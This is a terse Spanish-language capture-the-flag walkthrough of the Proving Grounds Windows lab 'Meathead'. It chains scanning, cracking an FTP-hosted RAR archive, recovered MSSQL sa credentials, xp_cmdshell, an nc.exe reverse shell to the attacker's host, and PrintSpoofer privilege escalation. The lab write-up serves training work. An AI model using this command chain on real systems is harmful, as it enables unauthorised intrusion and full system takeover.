Meathead

Sep 17, 2021
ProvingGrounds Windows

nmap -A -p- -oA meathead 192.168.198.70 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA meathead 192.168.198.70

nmap -sU -O -p- -oA meathead-udp 192.168.198.70

nikto -h 192.168.198.70:80

ssh_command.

whatweb http://192.168.198.70

ssh_command.

Vemos en http://192.168.198.70 un login de plantronics

ssh_command.

ftp -p 192.168.198.70 1221

ssh_command.

Nos metemos con las credenciales anonymous:anonymous

get MSSQL_BAK.rar

unrar e MSSQL_BAK.rar

rar2john MSSQL_BAK.rar

Ponemos el hash en un archivo llamado hash

ssh_command.

john —wordlist=/usr/share/wordlists/rockyou.txt hash Conseguimos la contrasena letmeinplease

ssh_command.

cat mssql_backup.txt

sa:EjectFrailtyThorn425

ssh_command.

python /opt/impacket/examples/mssqlclient.py -port 1435 sa:EjectFrailtyThorn425@192.168.198.70

ssh_command.

sp_configure “show advanced”, 1

sp_configure “xp_cmdshell”, 1

reconfigure

xp_cmdshell “whoami”

ssh_command.

cp /home/kali/Desktop/boxes/nc.exe .

Copiamos el binario de nc al folder principal

ssh_command.

xp_cmdshell \192.168.49.198\smbFolder\nc.exe -e cmd.exe 192.168.49.198 1221

nc -lvnp 1221

python3 /opt/impacket/examples/smbserver.py smbFolder $(pwd)

ssh_command.

whoami /all

Vemos el SeImpersonatePrivilege habilitado. Usamos el PrintSpoofer

ssh_command.

https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

systeminfo | findstr /B /C:“OS Name” /C:“OS Version” /C:“System Type”

Para encontrar la arquitectura de windows hacemos el siguiente comando de arriba.

ssh_command.

cd C:\FTP

copy \192.168.49.198\smbFolder\PrintSpoofer64.exe

ssh_command.

PrintSpoofer64.exe -i -c cmd

ssh_command.

type proof.txt

ssh_command.